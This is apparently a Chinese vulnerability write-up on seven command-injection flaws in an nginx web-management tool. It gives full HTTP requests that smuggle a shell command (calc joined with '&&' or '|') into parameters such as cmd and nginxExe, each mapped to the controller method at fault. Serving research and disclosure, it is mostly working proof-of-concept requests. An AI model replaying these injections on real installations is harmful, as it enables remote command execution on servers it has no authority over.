前言
结合目前未授权的情况,以及之前分析到的后台 RCE ,在这里做一个汇总,并进行一个比较简单的分析
「命令执行一」
GET /AdminPage/conf/runCmd?cmd=calc%26%26nginx HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
com.cym.controller.adminPage.ConfController#runCmd
当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接
「命令执行二」
POST /AdminPage/remote/cmdOver HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
remoteId=local&cmd=start calc%26%26nginx&interval=1
com.cym.controller.adminPage.RemoteController#cmdOver
当满足传入的参数所对应的值时,最终会调用 com.cym.controller.adminPage.ConfController#runCmd
com.cym.controller.adminPage.ConfController#runCmd
当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接
「命令执行三」
POST /Api/nginx/runNginxCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
cmd=calc%26%26nginx
com.cym.controller.api.NginxApiController#runNginxCmd
com.cym.controller.adminPage.ConfController#runCmd
当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接
「命令执行四」
GET /AdminPage/conf/reload?nginxExe=calc%20%7C HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
com.cym.controller.adminPage.ConfController#reload
「命令执行五」
POST /AdminPage/conf/check HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
nginxExe=calc%20%7C&json={"nginxContent":"","subContent":"[]","subName":"[]"}&nginxPath=/1/
com.cym.controller.adminPage.ConfController#check
要满足很多条件才可以触发
「命令执行六」
POST /AdminPage/conf/saveCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
nginxExe=calc%20%7C&nginxPath=/&nginxDir=/
com.cym.controller.adminPage.ConfController#saveCmd
将参数设置为配置信息
GET /AdminPage/conf/checkBase HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
从配置信息中读取并加载,执行命令
com.cym.controller.adminPage.ConfController#checkBase
「命令执行七」
POST /AdminPage/conf/saveCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
nginxExe=calc%20%7C&nginxPath=/&nginxDir=/
GET /Api/nginx/check HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
